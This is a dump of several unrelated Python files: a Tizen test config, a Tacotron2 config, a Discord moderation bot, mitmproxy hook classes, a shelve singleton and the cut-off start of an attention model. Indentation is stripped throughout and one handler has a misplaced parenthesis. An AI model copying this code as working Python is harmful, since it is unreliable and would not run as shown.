path = os.path.abspath(__file__)
path = os.path.split(path)[0]
os.chdir(path)
print path
device_ssh_ip = ""
ssh_device = device_ssh_ip.split(",")
path_tcs = path + "/tcs"
path_result = path + "/result"
path_allpairs = path + "/allpairs"
path_resource = path + "/resource"
seed_file = path_allpairs + "/positive/input_seed.txt"
seed_negative = path_allpairs + "/negative"
seed_positive = path_allpairs + "/positive"
seed_file_na = seed_negative + "/input_seed_negative.txt"
selfcomb_file = path_allpairs + "/selfcomb.txt"
output_file = path_allpairs + "/output.txt"
output_file_ne = path_allpairs + "/output_negative.txt"
report_path = path + "/report"
report_file = report_path + "/wrt-manifest-tizen-tests.xml"
report_summary_file = report_path + "/summary.xml"
sh_path = path + "/script"
log_path = report_path + "/log_"
device_path = "/home/app/content/tct/"
run_times = 3
version="6.35.1.2"
name="wrt-manifest-tizen-tests"
|
import json
import torch
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') # sets device for model and PyTorch tensors
meta_file = 'data/BZNSYP/ProsodyLabeling/000001-010000.txt'
wave_folder = 'data/BZNSYP/Wave'
vacab_file = 'data/vacab.json'
with open(vacab_file, 'r', encoding='utf-8') as file:
data = json.load(file)
VOCAB = data['VOCAB']
IVOCAB = data['IVOCAB']
num_train = 9900
num_valid = 100
################################
# Experiment Parameters #
################################
epochs = 500
iters_per_checkpoint = 1000
seed = 1234
dynamic_loss_scaling = True
fp16_run = False
distributed_run = False
################################
# Data Parameters #
################################
load_mel_from_disk = False
training_files = 'filelists/bznsyp_audio_text_train_filelist.txt'
validation_files = 'filelists/bznsyp_audio_text_valid_filelist.txt'
################################
# Audio Parameters #
################################
max_wav_value = 32768.0
sampling_rate = 22050
filter_length = 1024
hop_length = 256
win_length = 1024
n_mel_channels = 80
mel_fmin = 0.0
mel_fmax = 8000.0
################################
# Model Parameters #
################################
n_symbols = 35
symbols_embedding_dim = 512
# Encoder parameters
encoder_kernel_size = 5
encoder_n_convolutions = 3
encoder_embedding_dim = 512
# Decoder parameters
n_frames_per_step = 1 # currently only 1 is supported
decoder_rnn_dim = 1024
prenet_dim = 256
max_decoder_steps = 1000
gate_threshold = 0.5
p_attention_dropout = 0.1
p_decoder_dropout = 0.1
# Attention parameters
attention_rnn_dim = 1024
attention_dim = 128
# Location Layer parameters
attention_location_n_filters = 32
attention_location_kernel_size = 31
# Mel-post processing network parameters
postnet_embedding_dim = 512
postnet_kernel_size = 5
postnet_n_convolutions = 5
################################
# Optimization Hyperparameters #
################################
learning_rate = 1e-3
weight_decay = 1e-6
batch_size = 64
mask_padding = True # set model's padded outputs to padded values
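# Illustrative import site (class and module names assumed, not verified against
# the rest of this repo):
#   import config
#   model = Tacotron2(n_mel_channels=config.n_mel_channels, n_symbols=config.n_symbols)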
|
# Write a function that accepts two positive integers which are the height
# and width of a rectangle and returns a list that contains the area and perimeter
# of that rectangle.
def area_perimeter_rectangle(height, width):
result = []
result_area = height * width
result_perim = 2*(height + width)
result.append(result_area)
result.append(result_perim)
return result
# for testing purposes
print(area_perimeter_rectangle(4, 5))
# or
#
# def _rectangle_sample_(length, breadth):
# # Calculate the area
# area = length * breadth
# # Calculate the perimeter
# perimeter = 2*length + 2*breadth
# # Put area and perimeter
# # in a list called "output_list"
# output_list = [area, perimeter]
# # return output_list
# return output_list
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import discord
from discord.ext import commands
import asyncio, random
from lib import db
from discord_components import Button, ButtonStyle, DiscordComponents
class AdminCmds(commands.Cog):
def __init__(self, client):
self.client = client
@commands.has_permissions(manage_messages=True)
@commands.command(name="purge", aliases=['clear', 'delete'])
async def delete_channel_messages(self, ctx, limit: int=10):
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await ctx.channel.purge(limit=limit + 1)
await ctx.channel.send(f"<:salute:831807820118622258> Purged `{limit}` messages!")
await asyncio.sleep(2)
await ctx.channel.purge(limit=1)
if logch != 0:
embed = discord.Embed(title="Log Message", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(),
description=f"{ctx.author.mention} used `purge` in <#{ctx.channel.id}> to delete {limit} messages.")
embed.set_footer(text='Delta Δ is the fourth letter of the Greek Alphabet', icon_url=ctx.author.avatar_url)
embed.set_thumbnail(url="https://pandorafms.com/blog/wp-content/uploads/2020/12/567-Logs_-qu%C3%A9-son-y-por-qu%C3%A9-monitorizarlos.jpg")
await self.client.get_channel(logch).send(embed=embed)
@commands.has_permissions(kick_members=True)
@commands.command(name="kick")
async def kick_user(self, ctx, member: discord.Member, reason=None):
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await member.kick(reason=reason)
await ctx.message.delete()
await ctx.channel.send(f"<:pandacop:831800704372178944> Kicked {member.mention} successfully!")
if logch != 0:
embed=discord.Embed(title="Log Message", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(), description = f"{ctx.author.mention} used `kick` in <#{ctx.channel.id}> to **kick** {member.mention} because `{reason}`")
embed.set_footer(text='Delta Δ is the fourth letter of the Greek Alphabet', icon_url=ctx.author.avatar_url)
embed.set_thumbnail(url="https://pandorafms.com/blog/wp-content/uploads/2020/12/567-Logs_-qu%C3%A9-son-y-por-qu%C3%A9-monitorizarlos.jpg")
await self.client.get_channel(logch).send(embed=embed)
@commands.has_permissions(ban_members=True)
@commands.command(name="ban")
async def ban_user(self, ctx, member: discord.Member, reason=None):
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await member.ban()
#await ctx.channel.purge(limit=1)
await ctx.message.delete()
await ctx.channel.send(f"<:pandacop:831800704372178944> Banned {member.mention} successfully!")
if logch != 0:
embed=discord.Embed(title="Log Message", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(), description = f"{ctx.author.mention} used `ban` in <#{ctx.channel.id}> to **ban** {member.mention} because `{reason}`")
embed.set_footer(text='Delta Δ is the fourth letter of the Greek Alphabet', icon_url=ctx.author.avatar_url)
embed.set_thumbnail(url="https://pandorafms.com/blog/wp-content/uploads/2020/12/567-Logs_-qu%C3%A9-son-y-por-qu%C3%A9-monitorizarlos.jpg")
await self.client.get_channel(logch).send(embed=embed)
@commands.has_permissions(ban_members=True)
@commands.command(name="unban")
async def unban_user(self, ctx, *, member:discord.User):
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await ctx.guild.unban(member)
await ctx.channel.purge(limit=1)
await ctx.channel.send(f"<:pandacop:831800704372178944> Unbanned {member.mention} successfully!")
if logch != 0:
embed=discord.Embed(title="Log Message", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(), description = f"{ctx.author.mention} used `unban` in <#{ctx.channel.id}> to **unban** {member.mention}.")
embed.set_footer(text='Delta Δ is the fourth letter of the Greek Alphabet', icon_url=ctx.author.avatar_url)
embed.set_thumbnail(url="https://pandorafms.com/blog/wp-content/uploads/2020/12/567-Logs_-qu%C3%A9-son-y-por-qu%C3%A9-monitorizarlos.jpg")
await self.client.get_channel(logch).send(embed=embed)
@commands.command(name="masskick")
@commands.has_permissions(kick_members=True)
async def masskick(self, ctx, *users: discord.User):
#print(type(users))
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await asyncio.gather(*map(ctx.guild.kick, users))
await ctx.channel.purge(limit=1)
await ctx.channel.send(f"<:pandacop:831800704372178944> Kicked {len(users)} member/s successfully!")
if logch != 0:
embed=discord.Embed(title="Log Message", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(), description = f"{ctx.author.mention} used `masskick` in <#{ctx.channel.id}> to **kick** `{len(users)}` member/s.")
embed.set_footer(text='Delta Δ is the fourth letter of the Greek Alphabet', icon_url=ctx.author.avatar_url)
embed.set_thumbnail(url="https://pandorafms.com/blog/wp-content/uploads/2020/12/567-Logs_-qu%C3%A9-son-y-por-qu%C3%A9-monitorizarlos.jpg")
await self.client.get_channel(logch).send(embed=embed)
@commands.command(name="massban")
@commands.has_permissions(ban_members=True)
async def massban(self, ctx, *users: discord.User):
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await asyncio.gather(*map(ctx.guild.ban, users))
await ctx.channel.purge(limit=1)
await ctx.channel.send(f"<:pandacop:831800704372178944> Banned {len(users)} member/s successfully!")
if logch != 0:
embed=discord.Embed(title="Log Message", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(), description = f"{ctx.author.mention} used `massban` in <#{ctx.channel.id}> to **ban** `{len(users)}` member/s.")
embed.set_footer(text='Delta Δ is the fourth letter of the Greek Alphabet', icon_url=ctx.author.avatar_url)
embed.set_thumbnail(url="https://pandorafms.com/blog/wp-content/uploads/2020/12/567-Logs_-qu%C3%A9-son-y-por-qu%C3%A9-monitorizarlos.jpg")
await self.client.get_channel(logch).send(embed=embed)
@commands.command(name="massunban")
@commands.has_permissions(ban_members=True)
async def massunban(self, ctx, *users: discord.User):
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await asyncio.gather(*map(ctx.guild.unban, users))
await ctx.channel.purge(limit=1)
await ctx.channel.send(f"<:pandacop:831800704372178944> Unbanned {len(users)} member/s successfully!")
if logch != 0:
embed=discord.Embed(title="Log Message", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(), description = f"{ctx.author.mention} used `massunban` in <#{ctx.channel.id}> to **unban** `{len(users)}` member/s.")
embed.set_footer(text='Delta Δ is the fourth letter of the Greek Alphabet', icon_url=ctx.author.avatar_url)
embed.set_thumbnail(url="https://pandorafms.com/blog/wp-content/uploads/2020/12/567-Logs_-qu%C3%A9-son-y-por-qu%C3%A9-monitorizarlos.jpg")
await self.client.get_channel(logch).send(embed=embed)
@commands.has_permissions(manage_channels=True)
@commands.command(name='setlogch')
async def set_log_channel(self, ctx, chid: int):
try:
check_chid = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
check_guild_exists = db.cursor.execute("SELECT 1 FROM adminsettings WHERE GuildID = ? ", (ctx.guild.id,))
check_guild_exists = check_guild_exists.fetchone() is not None
if check_guild_exists == False and chid !=0:
print(ctx.guild.id)
db.execute("INSERT OR IGNORE INTO adminsettings(GuildID, LogChannelID) VALUES(?, ?)", ctx.guild.id, chid)
db.commit()
await ctx.channel.send(f"Log Channel successfully created at <#{chid}>")
if check_guild_exists == True and chid !=0:
db.execute("UPDATE adminsettings SET LogChannelID = ? WHERE GuildID = ?", chid, ctx.guild.id)
db.commit()
elif check_guild_exists == True and check_chid == 0:
db.execute("UPDATE adminsettings SET LogChannelID = ? WHERE GuildID = ?", chid, ctx.guild.id)
db.commit()
logch = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
await self.client.get_channel(logch).send(embed=discord.Embed(title="Log Channel created!", timestamp=ctx.message.created_at, color=discord.Color.dark_orange(), description = f"<#{logch}> has been set as `Log Channel`."))
except Exception as e:
print(e)
await ctx.channel.send("Make sure the bot has permission to read/send messages in the log channel and also provide the ChannelID correctly. ID must be an int.")
@commands.has_permissions(manage_channels=True)
@commands.command(name='deletelogch')
async def delete_log_channel(self, ctx):
#try:
check_guild_exists = db.cursor.execute("SELECT 1 FROM adminsettings WHERE GuildID = ?", (ctx.guild.id,))
#print('got check_guild_exists')
before_delete = db.field("SELECT LogChannelID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
#print('got before_delete')
        check_guild_exists = check_guild_exists.fetchone() is not None
#print('got check_guild_exists')
if check_guild_exists == True and before_delete !=0:
#print('check done')
db.execute("UPDATE adminsettings SET LogChannelID = ? WHERE GuildID = ?", 0, ctx.guild.id)
#print('db.execute done')
db.commit()
#print('saved')
await ctx.channel.send(f"Won't log messages in <#{before_delete}> anymore!")
@commands.Cog.listener()
async def on_guild_remove(self, guild):
db.execute("DELETE FROM adminsettings WHERE GuildID = ?", guild.id)
db.commit()
print('removed guild from adminsettings table')
@commands.is_owner()
@commands.command()
async def servers(self, ctx):
activeservers = self.client.guilds
for guild in activeservers:
await ctx.send(guild.name)
await ctx.channel.send(f"{guild.name} - {guild.owner}")
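    # The verify flow below posts three emoji buttons and asks the member to click the
    # one named in the prompt; a correct click within 60 seconds grants the role stored
    # in the adminsettings table for this guild.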
@commands.command(name="verify")
async def verify(self, ctx):
check_guild_exists = db.cursor.execute("SELECT 1 FROM adminsettings WHERE GuildID = ?", (ctx.guild.id,))
check_guild_exists = check_guild_exists.fetchone() is not None
#print(check_guild_exists)
check_verify = db.field("SELECT Verify FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
after_role = db.field("SELECT Roles FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
#print(check_verify)
role = discord.utils.find(lambda r: r.name == after_role, ctx.message.guild.roles)
check_verifych = db.field("SELECT VerifyChID FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
#print(type(check_verifych), type(ctx.channel.id))
#print(check_verify)
#print(check_guild_exists)
if check_verify == 'true' and int(check_verifych) == ctx.channel.id and check_guild_exists == True and role not in ctx.author.roles:
dict = {"apple": "🍎", "banana": "🍌", "meat": "🍗", "grapes": "🍇", "pineapple": "🍍", "airplane": "✈", "car": "🚕", "bird": "🐦", "penguin": "🐧", "horse": "🐴", "frog": "🐸", "hat": "👒"}
keys = random.sample(list(dict), 3)
# print(keys)
target = keys.index(keys[0])
randbuttons = random.sample(list(keys), 3)
#print(randbuttons)
#print(keys[target])
#print(target)
content = [
[
Button(style=ButtonStyle.grey, label=dict[randbuttons[0]], custom_id = randbuttons[0]),
Button(style=ButtonStyle.grey, label=dict[randbuttons[1]], custom_id = randbuttons[1]),
Button(style=ButtonStyle.grey, label=dict[randbuttons[2]], custom_id = randbuttons[2])
]
]
msg = await ctx.channel.send(f"Click on the {keys[0]} emoji to verify. You have 1 minute to do this!", components=content)
while True:
try:
interaction = await self.client.wait_for('button_click', timeout=60)
except asyncio.TimeoutError:
for row in content:
row.disable_components()
return await msg.edit(components=content)
if interaction.author.id != ctx.author.id:
print('non-user')
await interaction.respond(content='This is not your button to click')
elif interaction.author.id == ctx.author.id and interaction.custom_id != keys[target]:
for row in content:
row.disable_components()
await msg.edit("User clicked on the wrong button!", components=content)
return await interaction.respond(content='<:hellno:871582891585437759> Wrong! Do `*verify` to try again.')
elif interaction.author.id == ctx.author.id and interaction.custom_id == keys[target]:
for row in content:
row.disable_components()
await ctx.author.add_roles(role)
print('added role')
return await msg.edit(f"{ctx.author.mention} Welcome to **{ctx.guild.name}**!", components=content)
elif check_verify == 'false' or check_guild_exists == False:
await ctx.reply("<:pandacop:831800704372178944> You cannot run this command since it is not set in the server!")
elif role in ctx.author.roles:
await ctx.reply("You are already Verified")
elif int(check_verifych) != ctx.channel.id:
await ctx.reply(f"This command can only be run in <#{check_verifych}>")
@commands.has_permissions(administrator=True)
@commands.command(name="set_verify")
async def set_verify(self, ctx, operation: str, role: discord.Role = None, channel: discord.TextChannel = 0):
role = role.name if role != None else None
#print(type(channel))
if role != None:
if operation.lower() == 'add' and channel != 0:
#print('executed main')
channel = channel if isinstance(channel, int) else channel.id
check_guild_exists = db.cursor.execute("SELECT 1 FROM adminsettings WHERE GuildID = ?", (ctx.guild.id,))
search_role = discord.utils.find(lambda r:r.name == role, ctx.guild.roles)
print(search_role)
check_guild_exists = check_guild_exists.fetchone() is not None
guild_id_lists = [x.id for x in ctx.guild.text_channels]
#print(check_guild_exists)
#print(channel)
if search_role in ctx.guild.roles:
#print('found')
if operation.lower() == 'add' and check_guild_exists == True and channel in guild_id_lists:
db.execute("UPDATE adminsettings SET Verify = ? WHERE GuildID = ?", "true", ctx.guild.id)
db.execute("UPDATE adminsettings SET VerifyChID = ? WHERE GuildID = ?", channel, ctx.guild.id)
db.execute("UPDATE adminsettings SET Roles = ? WHERE GuildID = ?", role, ctx.guild.id)
db.commit()
#print('add executed')
await ctx.reply(f"<:verify:910515823590912010> Verification System has been turned on for **{ctx.guild.name}** successfully!")
#elif channel not in guild_id_lists:
#print('channel not in this guild')
if operation.lower() == 'add' and check_guild_exists == False and channel in guild_id_lists:
db.execute('INSERT OR IGNORE INTO adminsettings(GuildID, Verify, VerifyChID, Roles) VALUES(?, ?, ?, ?)', ctx.guild.id, "true", channel, role)
db.commit()
await ctx.reply(f"<:verify:910515823590912010> Verification System has been turned on for **{ctx.guild.name}** successfully!")
#print('add #2 executed')
#elif channel not in guild_id_lists:
#print("channel not in this guild(#2)")
else:
await ctx.reply(f"<:hellno:871582891585437759> Role, {role} Was Not Found!")
elif operation.lower() == 'add' and channel == 0:
embed = discord.Embed(title="<:hellno:871582891585437759> Missing Arguments",
description="```ini\nMissing Argument: [channel]```",
timestamp=ctx.message.created_at, color=discord.Color.dark_grey())
await ctx.send(embed=embed)
elif role == None and operation.lower() == 'add':
await ctx.channel.send("Role cannot be empty!!")
check_guild_exists = db.cursor.execute("SELECT 1 FROM adminsettings WHERE GuildID = ?", (ctx.guild.id,))
check_guild_exists = check_guild_exists.fetchone() is not None
if check_guild_exists:
check_verify_state = db.field("SELECT Verify FROM adminsettings WHERE GuildID = ?", ctx.guild.id)
#print(check_verify_state)
if operation.lower() == 'delete' and check_guild_exists == True and check_verify_state != 'false':
db.execute("UPDATE adminsettings SET Verify = ?, VerifyChID = ?, Roles = ? WHERE GuildID = ?", "false", None, None, ctx.guild.id)
db.commit()
#print('executed delete')
await ctx.reply(f'<:salute:831807820118622258> Disabled verification for **{ctx.guild.name}**!')
#print('executed add')
elif operation.lower() == 'delete' and check_guild_exists == False:
#print('cannot execute delete since no value is set.')
await ctx.reply("<:hellno:871582891585437759> Cannot disable verify if it has never been set in the server!")
elif operation.lower() == 'delete' and check_verify_state == 'false' and check_guild_exists == True:
await ctx.reply("<:hellno:871582891585437759> Cannot disable verify more than once!")
@commands.Cog.listener()
async def on_guild_remove(self, guild):
db.execute("DELETE FROM adminsettings WHERE GuildID = ?", guild.id)
db.commit()
print('removed guild from adminsettings table')
# @commands.command(name='temp')
# async def temp(self, ctx):
# #print(ctx.guild.roles.name)
# db.execute("ALTER TABLE adminsettings ADD COLUMN Verify")
# db.execute("ALTER TABLE adminsettings ADD COLUMN VerifyChID")
# db.execute("ALTER TABLE adminsettings ADD COLUMN Roles")
# db.commit()
# #search_role = discord.utils.find(lambda r:r.name == 'deez nutz', ctx.guild.roles)
# #await ctx.send(ctx.author.roles)
# #if search_role in ctx.guild.roles:
# #await ctx.channel.send('found')
# await ctx.channel.send("Executed temp")
@set_verify.error
async def set_verify_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Administrator permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [option], [role] and the [channel] parameters correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@set_log_channel.error
async def setlogch_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Manage Channels permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.magenta()))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [channel-id] parameter correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@delete_log_channel.error
async def deletelogch_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Manage Channels permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.magenta()))
@masskick.error
async def masskick_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Kick Members permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.magenta()))
if isinstance(error, commands.UserNotFound):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nSorry, the [member] you provided does not exists in the server.```"))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [member(s)] parameter correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@massban.error
async def massban_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Ban Members permission to use that command!```"), timestamp=ctx.message.created_at, color=discord.Color.greyple())
if isinstance(error, commands.UserNotFound):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description='```ini\nSorry, the [member] you provided does not exists in the server.```', timestamp=ctx.message.created_at, color=discord.Color.blurple()))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [member(s)] parameter correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@massunban.error
async def massunban_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description='```prolog\nYou must have the Ban Members permission to use that command!```', timestamp=ctx.message.created_at, color=discord.Color.gold()))
if isinstance(error, commands.UserNotFound):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description='```ini\nSorry, the [member] you provided does not exists in the server.```', timestamp=ctx.message.created_at, color=discord.Color.blurple()))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [member(s)] parameter correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@delete_channel_messages.error
async def purge_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Manage Messages permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@kick_user.error
async def kick_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Kick Members permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.magenta()))
if isinstance(error, commands.MemberNotFound):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nSorry, the [member] you provided does not exists in the server.```"))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [member] and the [reason] parameters correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@ban_user.error
async def ban_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Ban Members permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.greyple()))
if isinstance(error, commands.MemberNotFound):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description='```ini\nSorry, the [member] you provided does not exists in the server.```', timestamp=ctx.message.created_at, color=discord.Color.blurple()))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [member] and the [reason] parameters correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
@unban_user.error
async def unban_error_handling(self, ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description='```prolog\nYou must have the Ban Members permission to use that command!```', timestamp=ctx.message.created_at, color=discord.Color.gold()))
if isinstance(error, commands.MissingRequiredArgument):
await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Required Argument", description="```ini\nMake sure you have run the command providing the [member] parameter correctly!```", timestamp=ctx.message.created_at, color=discord.Color.blue()))
# @commands.command(name="lockdown")
# @commands.has_guild_permissions(manage_channels=True)
# @commands.bot_has_guild_permissions(manage_channels=True)
# async def lockdown(self, ctx, channel:discord.TextChannel=None):
# channel = channel or ctx.channel
# if ctx.guild.default_role not in channel.overwrites:
# overwrites = {ctx.guild.default_role : discord.PermissionOverwrite(send_messages=False)}
# await channel.edit(overwrites=overwrites)
# print('done #1')
# await ctx.send(f"`{channel.name}` is on Lockdown!!!")
#
# elif channel.overwrites[ctx.guild.default_role].send_messages == True or channel.overwrites[ctx.guild.default_role].send_messages == None:
# overwrites = channel.overwrites[ctx.guild.default_role]
# overwrites.send_messages = False
# await channel.set_permissions(ctx.guild.default_role, overwrite=overwrites)
# print('done #2')
# await ctx.send(f"`{channel.name}` is on Lockdown!!!")
#
#
#
#
# @commands.has_guild_permissions(manage_channels=True)
# @commands.bot_has_guild_permissions(manage_channels=True)
# @commands.command(name="unlock")
# async def unlock(self, ctx):
# await ctx.channel.set_permissions(ctx.guild.default_role, send_messages=True)
# await ctx.send(ctx.channel.name + " has been unlocked.")
# @lockdown.error
# async def lockdown_error_handling(self, ctx, error):
# if isinstance(error, commands.MissingPermissions):
# await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Manage Channels permission to use that command!```", timestamp=ctx.message.created_at, color=discord.Color.dark_grey()))
#
# @unlock.error
# async def unlock_error_handling(self, error, ctx):
# if isinstance(error, commands.MissingPermissions):
# await ctx.channel.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Permissions", description="```prolog\nYou must have the Manage Channels permission to use that command!", timestamp=ctx.message.created_at, color=discord.Color.dark_orange()))
def setup(client):
client.add_cog(AdminCmds(client))
|
from dataclasses import dataclass
from mitmproxy import connection
from . import commands
@dataclass
class ClientConnectedHook(commands.StartHook):
"""
A client has connected to mitmproxy. Note that a connection can
correspond to multiple HTTP requests.
Setting client.error kills the connection.
"""
client: connection.Client
@dataclass
class ClientDisconnectedHook(commands.StartHook):
"""
A client connection has been closed (either by us or the client).
"""
client: connection.Client
@dataclass
class ServerConnectionHookData:
"""Event data for server connection event hooks."""
server: connection.Server
"""The server connection this hook is about."""
client: connection.Client
"""The client on the other end."""
@dataclass
class ServerConnectHook(commands.StartHook):
"""
Mitmproxy is about to connect to a server.
Note that a connection can correspond to multiple requests.
Setting data.server.error kills the connection.
"""
data: ServerConnectionHookData
@dataclass
class ServerConnectedHook(commands.StartHook):
"""
Mitmproxy has connected to a server.
"""
data: ServerConnectionHookData
@dataclass
class ServerDisconnectedHook(commands.StartHook):
"""
A server connection has been closed (either by us or the server).
"""
data: ServerConnectionHookData
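# Hedged usage sketch (not part of the original module): addons receive these
# events as methods whose names follow the usual mitmproxy convention of the
# hook class name minus the "Hook" suffix, snake_cased. For example:
#
#     from mitmproxy import connection
#
#     class ConnectionLogger:
#         def client_connected(self, client: connection.Client):
#             print(f"client connected: {client.peername}")
#
#         def server_connect(self, data):  # data: ServerConnectionHookData
#             # Setting data.server.error here would kill the connection.
#             print(f"about to connect to: {data.server.address}")
#
#     addons = [ConnectionLogger()]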
|
import shelve
# Pattern Singleton
class MetaSingleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(MetaSingleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class DataBaseController(metaclass=MetaSingleton):
db = None
def __init__(self):
self.db = shelve.open('database.db', writeback=True)
def set(self, key, value):
try:
self.db[key] = value
except ValueError:
pass
def get(self, key):
try:
return self.db[key]
except KeyError:  # shelve raises KeyError for a missing key, not ValueError
return None
def dict(self):
return self.db
def sync(self):
try:
self.db.sync()
except ValueError:
pass
def close(self):
self.db.sync()
self.db.close()
def addVKSubscriber(self, subscriber_id, profile_id):
"""
:param subscriber_id: TgUID
:param profile_id: VKUID
:return: void
"""
def get_subscriber(self, profile_id):
"""
:param profile_id: VKID
:return: List<TgUID>
"""
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Deep recurrent attention model (DRAM).
Model based on https://arxiv.org/abs/1412.7755
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import tensorflow.compat.v1 as tf
from saccader.visual_attention import classification_model
from saccader.visual_attention import emission_model
from saccader.visual_attention import glimpse_model
class DRAMCell(object):
"""Deep Recurrent Attention Model Cell.
Recurrent neural network that performs classification on images by taking
glimpses at different locations on an image.
Attributes:
config: (Configuration object) With parameters:
num_units_rnn_layers: List of Integers indicating number of units in each
rnn layer. Length of list = 2 as there are two rnn layers.
rnn_activation: Activation function.
rnn_dropout_rate: Dropout rate for both input and output.
cell_type: RNN cell type ("lstm" or "gru").
num_resolutions: (Integer) Number of image resolutions used.
rnn_layers: List of RNN layers.
emission_net: Emission network object.
glimpse_net: Glimpse network object.
classification_net: Classification network object.
init_op: Initialization operations for model variables.
